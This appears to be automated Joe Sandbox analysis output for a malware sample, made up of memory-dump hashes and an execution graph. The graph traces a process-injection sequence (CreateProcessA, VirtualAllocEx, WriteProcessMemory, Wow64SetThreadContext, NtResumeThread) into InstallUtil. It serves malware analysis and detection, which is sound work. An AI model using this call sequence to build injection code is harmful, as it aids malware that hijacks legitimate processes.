                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ba25c109e600a9ee8383c68f6fe7dae062290eb0b9b0db4011f1633c022de9a
                                                              • Instruction ID: acf509e7aac4c45841088e3e96a0d34173ef44c7d29964472b2e6ecafb3148e3
                                                              • Opcode Fuzzy Hash: 6ba25c109e600a9ee8383c68f6fe7dae062290eb0b9b0db4011f1633c022de9a
                                                              • Instruction Fuzzy Hash: 19218030E1060A9BDF19CFA8C454A9EF7B2BF89314F10861AF915B7380EB70A881CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98d7c17393fc12cbd3931c2ccc25693c994d39ec68e615a4133be4b2cd22700e
                                                              • Instruction ID: 81a29ebc92de029e355ddf2c2520f2964f744784fa554e07a3d48e8e0689ae79
                                                              • Opcode Fuzzy Hash: 98d7c17393fc12cbd3931c2ccc25693c994d39ec68e615a4133be4b2cd22700e
                                                              • Instruction Fuzzy Hash: 3B213A31B20205CFEB14EB78C555BAE77F6AF49305F200468D606EB7A5EB359C50CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db7e5bc86cbe42365c9e3d4ce0d15e1585cdc810da886dc5b667445e6751d2c7
                                                              • Instruction ID: 48f2a0b788ff9463f3b3c95862af1644a24453c11f5d86bb83e3bff038abe8f6
                                                              • Opcode Fuzzy Hash: db7e5bc86cbe42365c9e3d4ce0d15e1585cdc810da886dc5b667445e6751d2c7
                                                              • Instruction Fuzzy Hash: E821A579610201CFEB27EB6CE88475D37A5EB48311F104E25E106CB76AFB34E8649BA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1568328101.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_123d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                                              • Instruction ID: c99c9645875b7e587dea289eab0f043165327bc5ce5f439fc3a798e25b921594
                                                              • Opcode Fuzzy Hash: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                                              • Instruction Fuzzy Hash: D321B3B14083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33A9806CB62
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b682d1533dff7414bd51a48f05eb1295e468b63e7ed0b50d57384b9f8b7ccd52
                                                              • Instruction ID: a03f0d9b9bea37ef090ac98c2183f2ae07ab5a3c0e20a0aa92a02e60df5a9320
                                                              • Opcode Fuzzy Hash: b682d1533dff7414bd51a48f05eb1295e468b63e7ed0b50d57384b9f8b7ccd52
                                                              • Instruction Fuzzy Hash: FF112931F24306DFEF225679D8063693394EB46214F10497AF206CF2A2EA65CD458BDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44bdc0c9ac3dbe81cc6b26f95af493041a9fa8bdc754c1c4ce75419f07918dbd
                                                              • Instruction ID: 528c9c1623dcaf4a106b545c9f23d20bd6d3b8d18c066d50727bd5a0757df746
                                                              • Opcode Fuzzy Hash: 44bdc0c9ac3dbe81cc6b26f95af493041a9fa8bdc754c1c4ce75419f07918dbd
                                                              • Instruction Fuzzy Hash: 1E119130B2030ACFEF25AA7DD4457693395FB45214F204979F206DF362DA61CC458BDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4db400a5e3cd72b3208827f4c70082c07aee09ea9036caafd4a0a29d2e3a04c2
                                                              • Instruction ID: 2ff435bdc2ea385b8eac35a75c1a06b09dd77876a10b6cfaf6bbadba74792110
                                                              • Opcode Fuzzy Hash: 4db400a5e3cd72b3208827f4c70082c07aee09ea9036caafd4a0a29d2e3a04c2
                                                              • Instruction Fuzzy Hash: 59118476F11211DFDF11AB78A84476E7FE6FB88750B104A29E906D3345EB3489128BE1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4a820a1a2e83f00464cf8582f33785386add693a656a0afa6f632a34bcafd17
                                                              • Instruction ID: d410aef5f02266539195715175b582a709186e0da706143dfc8110c2e1939d53
                                                              • Opcode Fuzzy Hash: f4a820a1a2e83f00464cf8582f33785386add693a656a0afa6f632a34bcafd17
                                                              • Instruction Fuzzy Hash: EB016931A102168BCF21EFBCC5401AEBBF9EB48224F24047AD905E7A41EA35C842CB95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 186efe1babb8af13ee37b1fbdfdd5dae69418bbb012d20288f7df1d4dc9ecab5
                                                              • Instruction ID: 75f7fdef782a3a2d3e05894951a52df2249ef79649fdf94c994f630c3bc4ce82
                                                              • Opcode Fuzzy Hash: 186efe1babb8af13ee37b1fbdfdd5dae69418bbb012d20288f7df1d4dc9ecab5
                                                              • Instruction Fuzzy Hash: 89111C34C2029ACFDF34EA98E5987ECB7B1EF51319F14542AC201B6991DB7458C9CB16
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 251ce2a28eb9b37d7e7f5f8c15acbee3f5ea197b8149cfc973841de3b6916587
                                                              • Instruction ID: 68000983a089ca5bc1910552bf43340b4113d7d38c60f333e197f68ef04b040d
                                                              • Opcode Fuzzy Hash: 251ce2a28eb9b37d7e7f5f8c15acbee3f5ea197b8149cfc973841de3b6916587
                                                              • Instruction Fuzzy Hash: F101A270500289DFDB06EBB8E990ADC7BB1EF45310B840A9DC4405F297EF346E16E795
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6800b8570d9f60de320568958656c6ba839bbcabbe0dc27c3a6a7a2b2a263fe2
                                                              • Instruction ID: 10024fe13071f00b60ab4f70d2b94ea837f3ff958e98fb3cf1fd3ff862a6d547
                                                              • Opcode Fuzzy Hash: 6800b8570d9f60de320568958656c6ba839bbcabbe0dc27c3a6a7a2b2a263fe2
                                                              • Instruction Fuzzy Hash: 7FF04F70A00209EFDB05FBB8FD80A9D7BB1EB44300F90466DC4049B255EF306E14ABA1

                                                              Execution Graph

                                                              Execution Coverage:11%
                                                              Dynamic/Decrypted Code Coverage:98.4%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:511
                                                              Total number of Limit Nodes:56
                                                              execution_graph 61123 1314ac0 61126 1314670 61123->61126 61125 1314ace 61127 131467b 61126->61127 61130 1314804 61127->61130 61129 1314bfd 61129->61125 61131 131480f 61130->61131 61134 1314834 61131->61134 61133 1314cda 61133->61129 61135 131483f 61134->61135 61138 1314864 61135->61138 61137 1314ddc 61137->61133 61139 131486f 61138->61139 61147 1317930 61139->61147 61141 1317bf0 61143 1317ddb 61141->61143 61152 131a7f8 61141->61152 61142 1317e19 61142->61137 61143->61142 61156 131c8e1 61143->61156 61161 131c8f0 61143->61161 61148 131793b 61147->61148 61149 13193da 61148->61149 61166 1319429 61148->61166 61170 1319438 61148->61170 61149->61141 61174 131a830 61152->61174 61178 131a823 61152->61178 61153 131a80e 61153->61143 61157 131c8f0 61156->61157 61158 131c935 61157->61158 61214 131cbb0 61157->61214 61218 131cbc0 61157->61218 61158->61142 61162 131c911 61161->61162 61163 131c935 61162->61163 61164 131cbb0 5 API calls 61162->61164 61165 131cbc0 5 API calls 61162->61165 61163->61142 61164->61163 61165->61163 61167 1319438 61166->61167 61168 1319486 KiUserCallbackDispatcher 61167->61168 61169 13194b0 61167->61169 61168->61169 61169->61149 61171 131947b 61170->61171 61172 13194b0 61171->61172 61173 1319486 KiUserCallbackDispatcher 61171->61173 61172->61149 61173->61172 61183 131a919 61174->61183 61193 131a928 61174->61193 61175 131a83f 61175->61153 61179 131a830 61178->61179 61181 131a919 2 API calls 61179->61181 61182 131a928 2 API calls 61179->61182 61180 131a83f 61180->61153 61181->61180 61182->61180 61184 131a928 61183->61184 61187 131a95c 61184->61187 61203 13190a8 61184->61203 61187->61175 61188 131ab60 GetModuleHandleW 61190 131ab8d 61188->61190 61189 131a954 61189->61187 61189->61188 61190->61175 61194 131a939 61193->61194 61197 131a95c 61193->61197 61195 13190a8 GetModuleHandleW 61194->61195 61196 131a944 61195->61196 61196->61197 61201 131afb0 GetModuleHandleW 61196->61201 61202 131afc0 GetModuleHandleW 61196->61202 61197->61175 61198 131ab60 GetModuleHandleW 61200 131ab8d 61198->61200 61199 131a954 61199->61197 61199->61198 61200->61175 61201->61199 61202->61199 61204 131ab18 GetModuleHandleW 61203->61204 61206 131a944 61204->61206 61206->61187 61207 131afc0 61206->61207 61210 131afb0 61206->61210 61208 13190a8 GetModuleHandleW 61207->61208 61209 131afd4 61208->61209 61209->61189 61211 131afc0 61210->61211 61212 13190a8 GetModuleHandleW 61211->61212 61213 131afd4 61212->61213 61213->61189 61215 131cbcd 61214->61215 61216 131cc07 61215->61216 61222 131aea8 61215->61222 61216->61158 61219 131cbcd 61218->61219 61220 131cc07 61219->61220 61221 131aea8 5 API calls 61219->61221 61220->61158 61221->61220 61223 131aeb3 61222->61223 61225 131d920 61223->61225 61226 131d4e0 61223->61226 61225->61225 61227 131d4eb 61226->61227 61228 1314864 5 API calls 61227->61228 61229 131d98f 61228->61229 61229->61225 61082 6bb91f9 61085 6bbea78 61082->61085 61086 6bbea8d 61085->61086 61089 6bbeac8 61086->61089 61091 6bbeaef 61089->61091 61093 6bbebd0 61091->61093 61094 6bbec10 VirtualAlloc 61093->61094 61096 6bb01df 61094->61096 61101 6b273e0 61102 6b2742e NtProtectVirtualMemory 61101->61102 61104 6b27478 61102->61104 61019 6bb979e 61022 6bbd708 61019->61022 61025 6bbd72f 61022->61025 61026 6bbdb58 61025->61026 61027 6bbdba0 VirtualProtect 61026->61027 61029 6bb97bc 61027->61029 61230 6b375c6 61231 6b375cc 61230->61231 61235 6c030d8 61231->61235 61239 6c030c9 61231->61239 61232 6b376b4 61236 6c030ed 61235->61236 61237 6c03103 61236->61237 61243 6c03626 61236->61243 61237->61232 61240 6c030ed 61239->61240 61241 6c03103 61240->61241 61242 6c03626 10 API calls 61240->61242 61241->61232 61242->61241 61244 6c03630 61243->61244 61248 6c048d0 61244->61248 61253 6c048e0 61244->61253 61245 6c0357d 61245->61237 61249 6c048e0 61248->61249 61258 6c04930 61249->61258 61262 6c0491f 61249->61262 61250 6c04917 61250->61245 61254 6c048f5 61253->61254 61256 6c04930 10 API calls 61254->61256 61257 6c0491f 10 API calls 61254->61257 61255 6c04917 61255->61245 61256->61255 61257->61255 61259 6c0495d 61258->61259 61260 6c04a09 61259->61260 61266 6c05089 61259->61266 61260->61250 61264 6c04930 61262->61264 61263 6c04a09 61263->61250 61264->61263 61265 6c05089 10 API calls 61264->61265 61265->61264 61267 6c05091 61266->61267 61315 6c059bb 61267->61315 61320 6c0553b 61267->61320 61325 6c05739 61267->61325 61330 6c05536 61267->61330 61335 6c060b5 61267->61335 61340 6c06275 61267->61340 61345 6c054f4 61267->61345 61350 6c061b3 61267->61350 61356 6c05df0 61267->61356 61361 6c05aaf 61267->61361 61366 6c0532e 61267->61366 61371 6c052ee 61267->61371 61376 6c05e6d 61267->61376 61380 6c05cab 61267->61380 61385 6c054aa 61267->61385 61390 6c053e9 61267->61390 61395 6c05ba9 61267->61395 61403 6c05ee7 61267->61403 61408 6c05665 61267->61408 61413 6c051e3 61267->61413 61418 6c05263 61267->61418 61423 6c05d62 61267->61423 61428 6c0595f 61267->61428 61433 6c05f9d 61267->61433 61438 6c057dc 61267->61438 61443 6c05f1c 61267->61443 61448 6c05c54 61267->61448 61453 6c05253 61267->61453 61458 6c05191 61267->61458 61463 6c05b8c 61267->61463 61468 6c0590b 61267->61468 61473 6c0574b 61267->61473 61478 6c0560b 61267->61478 61483 6c05b0a 61267->61483 61488 6c055c9 61267->61488 61497 6c05906 61267->61497 61502 6c05d45 61267->61502 61507 6c06005 61267->61507 61515 6c05b44 61267->61515 61520 6c05484 61267->61520 61525 6c05d04 61267->61525 61529 6c05883 61267->61529 61534 6c058c0 61267->61534 61539 6c05780 61267->61539 61544 6c051be 61267->61544 61549 6c0587e 61267->61549 61316 6c051ca 61315->61316 61317 6c062ee 61316->61317 61554 6b28200 61316->61554 61558 6b28208 61316->61558 61321 6c051ca 61320->61321 61322 6c062ee 61321->61322 61323 6b28200 WriteProcessMemory 61321->61323 61324 6b28208 WriteProcessMemory 61321->61324 61323->61321 61324->61321 61326 6c051ca 61325->61326 61327 6c062ee 61326->61327 61328 6b28200 WriteProcessMemory 61326->61328 61329 6b28208 WriteProcessMemory 61326->61329 61328->61326 61329->61326 61331 6c051ca 61330->61331 61332 6c062ee 61331->61332 61333 6b28200 WriteProcessMemory 61331->61333 61334 6b28208 WriteProcessMemory 61331->61334 61333->61331 61334->61331 61336 6c051ca 61335->61336 61337 6c062ee 61336->61337 61338 6b28200 WriteProcessMemory 61336->61338 61339 6b28208 WriteProcessMemory 61336->61339 61338->61336 61339->61336 61341 6c051ca 61340->61341 61342 6c062ee 61341->61342 61343 6b28200 WriteProcessMemory 61341->61343 61344 6b28208 WriteProcessMemory 61341->61344 61343->61341 61344->61341 61346 6c051ca 61345->61346 61347 6c062ee 61346->61347 61348 6b28200 WriteProcessMemory 61346->61348 61349 6b28208 WriteProcessMemory 61346->61349 61348->61346 61349->61346 61351 6c05d03 61350->61351 61352 6c061bd 61350->61352 61562 6c07e08 61351->61562 61567 6c07df8 61351->61567 61353 6c05d1c 61357 6c051ca 61356->61357 61358 6c062ee 61357->61358 61359 6b28200 WriteProcessMemory 61357->61359 61360 6b28208 WriteProcessMemory 61357->61360 61359->61357 61360->61357 61362 6c051ca 61361->61362 61363 6c062ee 61362->61363 61364 6b28200 WriteProcessMemory 61362->61364 61365 6b28208 WriteProcessMemory 61362->61365 61364->61362 61365->61362 61367 6c051ca 61366->61367 61368 6c062ee 61367->61368 61369 6b28200 WriteProcessMemory 61367->61369 61370 6b28208 WriteProcessMemory 61367->61370 61369->61367 61370->61367 61372 6c051ca 61371->61372 61373 6c062ee 61372->61373 61374 6b28200 WriteProcessMemory 61372->61374 61375 6b28208 WriteProcessMemory 61372->61375 61374->61372 61375->61372 61580 6c07ed8 61376->61580 61585 6c07ee8 61376->61585 61377 6c05e85 61381 6c051ca 61380->61381 61382 6c062ee 61381->61382 61383 6b28200 WriteProcessMemory 61381->61383 61384 6b28208 WriteProcessMemory 61381->61384 61383->61381 61384->61381 61386 6c06210 61385->61386 61590 6b280b8 61386->61590 61595 6b28108 61386->61595 61387 6c06256 61391 6c051ca 61390->61391 61392 6c062ee 61391->61392 61393 6b28200 WriteProcessMemory 61391->61393 61394 6b28208 WriteProcessMemory 61391->61394 61393->61391 61394->61391 61396 6c05bc9 61395->61396 61399 6b28200 WriteProcessMemory 61396->61399 61400 6b28208 WriteProcessMemory 61396->61400 61397 6c051ca 61398 6c050cf 61397->61398 61401 6b28200 WriteProcessMemory 61397->61401 61402 6b28208 WriteProcessMemory 61397->61402 61398->61259 61399->61397 61400->61397 61401->61397 61402->61397 61404 6c05ef1 61403->61404 61406 6b280b8 VirtualAllocEx 61404->61406 61407 6b28108 VirtualAllocEx 61404->61407 61405 6c06256 61406->61405 61407->61405 61409 6c051ca 61408->61409 61409->61408 61410 6c062ee 61409->61410 61411 6b28200 WriteProcessMemory 61409->61411 61412 6b28208 WriteProcessMemory 61409->61412 61411->61409 61412->61409 61414 6c051ca 61413->61414 61415 6c062ee 61414->61415 61416 6b28200 WriteProcessMemory 61414->61416 61417 6b28208 WriteProcessMemory 61414->61417 61416->61414 61417->61414 61419 6c051ca 61418->61419 61420 6c062ee 61419->61420 61421 6b28200 WriteProcessMemory 61419->61421 61422 6b28208 WriteProcessMemory 61419->61422 61421->61419 61422->61419 61424 6c051ca 61423->61424 61425 6c062ee 61424->61425 61426 6b28200 WriteProcessMemory 61424->61426 61427 6b28208 WriteProcessMemory 61424->61427 61426->61424 61427->61424 61429 6c051ca 61428->61429 61430 6c062ee 61429->61430 61431 6b28200 WriteProcessMemory 61429->61431 61432 6b28208 WriteProcessMemory 61429->61432 61431->61429 61432->61429 61434 6c05fb5 61433->61434 61436 6b28200 WriteProcessMemory 61434->61436 61437 6b28208 WriteProcessMemory 61434->61437 61435 6c05fe2 61436->61435 61437->61435 61439 6c051ca 61438->61439 61440 6c062ee 61439->61440 61441 6b28200 WriteProcessMemory 61439->61441 61442 6b28208 WriteProcessMemory 61439->61442 61441->61439 61442->61439 61444 6c06210 61443->61444 61446 6b280b8 VirtualAllocEx 61444->61446 61447 6b28108 VirtualAllocEx 61444->61447 61445 6c06256 61446->61445 61447->61445 61449 6c051ca 61448->61449 61450 6c062ee 61449->61450 61451 6b28200 WriteProcessMemory 61449->61451 61452 6b28208 WriteProcessMemory 61449->61452 61451->61449 61452->61449 61454 6c051ca 61453->61454 61455 6c062ee 61454->61455 61456 6b28200 WriteProcessMemory 61454->61456 61457 6b28208 WriteProcessMemory 61454->61457 61456->61454 61457->61454 61459 6c051a2 61458->61459 61460 6c062ee 61459->61460 61461 6b28200 WriteProcessMemory 61459->61461 61462 6b28208 WriteProcessMemory 61459->61462 61461->61459 61462->61459 61464 6c051ca 61463->61464 61465 6c062ee 61464->61465 61466 6b28200 WriteProcessMemory 61464->61466 61467 6b28208 WriteProcessMemory 61464->61467 61466->61464 61467->61464 61469 6c051ca 61468->61469 61470 6c062ee 61469->61470 61471 6b28200 WriteProcessMemory 61469->61471 61472 6b28208 WriteProcessMemory 61469->61472 61471->61469 61472->61469 61474 6c051ca 61473->61474 61475 6c062ee 61474->61475 61476 6b28200 WriteProcessMemory 61474->61476 61477 6b28208 WriteProcessMemory 61474->61477 61476->61474 61477->61474 61479 6c051ca 61478->61479 61480 6c062ee 61479->61480 61481 6b28200 WriteProcessMemory 61479->61481 61482 6b28208 WriteProcessMemory 61479->61482 61481->61479 61482->61479 61484 6c051ca 61483->61484 61485 6c062ee 61484->61485 61486 6b28200 WriteProcessMemory 61484->61486 61487 6b28208 WriteProcessMemory 61484->61487 61486->61484 61487->61484 61489 6c051ca 61488->61489 61490 6c06130 61488->61490 61492 6c062ee 61489->61492 61495 6b28200 WriteProcessMemory 61489->61495 61496 6b28208 WriteProcessMemory 61489->61496 61599 6b283b0 61490->61599 61603 6b283b8 61490->61603 61491 6c06171 61495->61489 61496->61489 61498 6c051ca 61497->61498 61499 6c062ee 61498->61499 61500 6b28200 WriteProcessMemory 61498->61500 61501 6b28208 WriteProcessMemory 61498->61501 61500->61498 61501->61498 61503 6c051ca 61502->61503 61504 6c062ee 61503->61504 61505 6b28200 WriteProcessMemory 61503->61505 61506 6b28208 WriteProcessMemory 61503->61506 61505->61503 61506->61503 61508 6c0601d 61507->61508 61607 6c067a8 61508->61607 61613 6c06799 61508->61613 61509 6c051ca 61510 6c062ee 61509->61510 61513 6b28200 WriteProcessMemory 61509->61513 61514 6b28208 WriteProcessMemory 61509->61514 61513->61509 61514->61509 61516 6c051ca 61515->61516 61517 6c062ee 61516->61517 61518 6b28200 WriteProcessMemory 61516->61518 61519 6b28208 WriteProcessMemory 61516->61519 61518->61516 61519->61516 61521 6c051ca 61520->61521 61522 6c062ee 61521->61522 61523 6b28200 WriteProcessMemory 61521->61523 61524 6b28208 WriteProcessMemory 61521->61524 61523->61521 61524->61521 61527 6c07e08 2 API calls 61525->61527 61528 6c07df8 2 API calls 61525->61528 61526 6c05d1c 61527->61526 61528->61526 61530 6c051ca 61529->61530 61531 6c062ee 61530->61531 61532 6b28200 WriteProcessMemory 61530->61532 61533 6b28208 WriteProcessMemory 61530->61533 61532->61530 61533->61530 61535 6c051ca 61534->61535 61536 6c062ee 61535->61536 61537 6b28200 WriteProcessMemory 61535->61537 61538 6b28208 WriteProcessMemory 61535->61538 61537->61535 61538->61535 61540 6c051ca 61539->61540 61541 6c062ee 61540->61541 61542 6b28200 WriteProcessMemory 61540->61542 61543 6b28208 WriteProcessMemory 61540->61543 61542->61540 61543->61540 61545 6c051ca 61544->61545 61546 6c062ee 61545->61546 61547 6b28200 WriteProcessMemory 61545->61547 61548 6b28208 WriteProcessMemory 61545->61548 61547->61545 61548->61545 61550 6c06156 61549->61550 61552 6b283b0 NtResumeThread 61550->61552 61553 6b283b8 NtResumeThread 61550->61553 61551 6c06171 61552->61551 61553->61551 61555 6b28208 WriteProcessMemory 61554->61555 61557 6b282a7 61555->61557 61557->61316 61559 6b28250 WriteProcessMemory 61558->61559 61561 6b282a7 61559->61561 61561->61316 61563 6c07e1d 61562->61563 61572 6b27ce1 61563->61572 61576 6b27ce8 61563->61576 61564 6c07e36 61564->61353 61568 6c07e08 61567->61568 61570 6b27ce1 Wow64SetThreadContext 61568->61570 61571 6b27ce8 Wow64SetThreadContext 61568->61571 61569 6c07e36 61569->61353 61570->61569 61571->61569 61573 6b27ce8 Wow64SetThreadContext 61572->61573 61575 6b27d75 61573->61575 61575->61564 61577 6b27d2d Wow64SetThreadContext 61576->61577 61579 6b27d75 61577->61579 61579->61564 61581 6c07efd 61580->61581 61583 6b27ce1 Wow64SetThreadContext 61581->61583 61584 6b27ce8 Wow64SetThreadContext 61581->61584 61582 6c07f16 61582->61377 61583->61582 61584->61582 61586 6c07efd 61585->61586 61588 6b27ce1 Wow64SetThreadContext 61586->61588 61589 6b27ce8 Wow64SetThreadContext 61586->61589 61587 6c07f16 61587->61377 61588->61587 61589->61587 61591 6b280f8 VirtualAllocEx 61590->61591 61592 6b280c6 61590->61592 61594 6b28185 61591->61594 61592->61387 61594->61387 61596 6b28148 VirtualAllocEx 61595->61596 61598 6b28185 61596->61598 61598->61387 61600 6b283b8 NtResumeThread 61599->61600 61602 6b28435 61600->61602 61602->61491 61604 6b28400 NtResumeThread 61603->61604 61606 6b28435 61604->61606 61606->61491 61608 6c067bf 61607->61608 61609 6c067e1 61608->61609 61619 6c06b14 61608->61619 61624 6c0698c 61608->61624 61629 6c0692b 61608->61629 61609->61509 61614 6c067a8 61613->61614 61615 6c067e1 61614->61615 61616 6c06b14 2 API calls 61614->61616 61617 6c0692b 2 API calls 61614->61617 61618 6c0698c 2 API calls 61614->61618 61615->61509 61616->61615 61617->61615 61618->61615 61620 6c06b2d 61619->61620 61634 6b279e8 61620->61634 61638 6b279dd 61620->61638 61625 6c069b4 61624->61625 61626 6c0689f 61625->61626 61627 6b279e8 CreateProcessA 61625->61627 61628 6b279dd CreateProcessA 61625->61628 61627->61626 61628->61626 61630 6c06939 61629->61630 61631 6c0689f 61630->61631 61632 6b279e8 CreateProcessA 61630->61632 61633 6b279dd CreateProcessA 61630->61633 61632->61631 61633->61631 61635 6b27a4c CreateProcessA 61634->61635 61637 6b27bd4 61635->61637 61639 6b27a4c CreateProcessA 61638->61639 61641 6b27bd4 61639->61641 61105 6bba15d 61107 6bbd708 VirtualProtect 61105->61107 61106 6bb01df 61107->61106 61108 131ccd8 61109 131cd1e 61108->61109 61113 131ceb8 61109->61113 61116 131ceab 61109->61116 61110 131ce0b 61120 131af70 61113->61120 61117 131ceb8 61116->61117 61118 131af70 DuplicateHandle 61117->61118 61119 131cee6 61118->61119 61119->61110 61121 131cf20 DuplicateHandle 61120->61121 61122 131cee6 61121->61122 61122->61110 60994 6b377b8 60995 6b377c2 60994->60995 60999 6b4ed30 60995->60999 61004 6b4ed22 60995->61004 60996 6b37800 61000 6b4ed45 60999->61000 61009 6b4ef10 61000->61009 61014 6b4ee03 61000->61014 61001 6b4ed5b 61001->60996 61005 6b4ed30 61004->61005 61007 6b4ef10 2 API calls 61005->61007 61008 6b4ee03 2 API calls 61005->61008 61006 6b4ed5b 61006->60996 61007->61006 61008->61006 61010 6b4ef16 61009->61010 61011 6b4ef72 61010->61011 61012 6b285f8 VirtualProtect 61010->61012 61013 6b285f0 VirtualProtect 61010->61013 61011->61001 61012->61010 61013->61010 61015 6b4ee25 61014->61015 61016 6b4ef72 61015->61016 61017 6b285f0 VirtualProtect 61015->61017 61018 6b285f8 VirtualProtect 61015->61018 61016->61001 61017->61015 61018->61015 61642 6bb2bc7 61643 6bb2be6 61642->61643 61645 6bbd708 VirtualProtect 61643->61645 61644 6bb2c11 61645->61644 61030 6b3780e 61031 6b37818 61030->61031 61035 6b2a158 61031->61035 61042 6b2a148 61031->61042 61032 6b37856 61036 6b2a16d 61035->61036 61049 6b2a188 61036->61049 61054 6b2a198 61036->61054 61059 6b2a228 61036->61059 61064 6b2a669 61036->61064 61037 6b2a183 61037->61032 61043 6b2a158 61042->61043 61045 6b2a228 2 API calls 61043->61045 61046 6b2a198 2 API calls 61043->61046 61047 6b2a188 2 API calls 61043->61047 61048 6b2a669 2 API calls 61043->61048 61044 6b2a183 61044->61032 61045->61044 61046->61044 61047->61044 61048->61044 61050 6b2a198 61049->61050 61051 6b2a2b6 61050->61051 61052 6b285f0 VirtualProtect 61050->61052 61053 6b285f8 VirtualProtect 61050->61053 61051->61037 61052->61050 61053->61050 61056 6b2a1c5 61054->61056 61055 6b2a2b6 61055->61037 61056->61055 61057 6b285f0 VirtualProtect 61056->61057 61058 6b285f8 VirtualProtect 61056->61058 61057->61056 61058->61056 61061 6b2a212 61059->61061 61060 6b2a2b6 61060->61037 61061->61060 61062 6b285f0 VirtualProtect 61061->61062 61063 6b285f8 VirtualProtect 61061->61063 61062->61061 61063->61061 61065 6b2a2b6 61064->61065 61066 6b2a212 61064->61066 61065->61037 61066->61065 61067 6b285f0 VirtualProtect 61066->61067 61068 6b285f8 VirtualProtect 61066->61068 61067->61066 61068->61066 61069 127d118 61070 127d130 61069->61070 61071 127d18b 61070->61071 61073 6bbe1c0 61070->61073 61074 6bbe1e8 61073->61074 61077 6bbe680 61074->61077 61075 6bbe20f 61078 6bbe6ad 61077->61078 61079 6bbd708 VirtualProtect 61078->61079 61081 6bbe843 61078->61081 61080 6bbe834 61079->61080 61080->61075 61081->61075
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 6c83fda5de92b7ae70e4bf6119af1db41b7b24a9dcc3dc9ecdc3c39330b0133d
                                                              • Instruction ID: 169673d0b9420f0fff2a02953852b243646ecead9348b4cc3023d29b1fd12710
                                                              • Opcode Fuzzy Hash: 6c83fda5de92b7ae70e4bf6119af1db41b7b24a9dcc3dc9ecdc3c39330b0133d
                                                              • Instruction Fuzzy Hash: C6B2E374B00228CFDB54DFA9C994BADBBB6FF88700F158199E505AB2A5DB70EC41CB50
                                                              Strings
                                                              Memory Dump Source
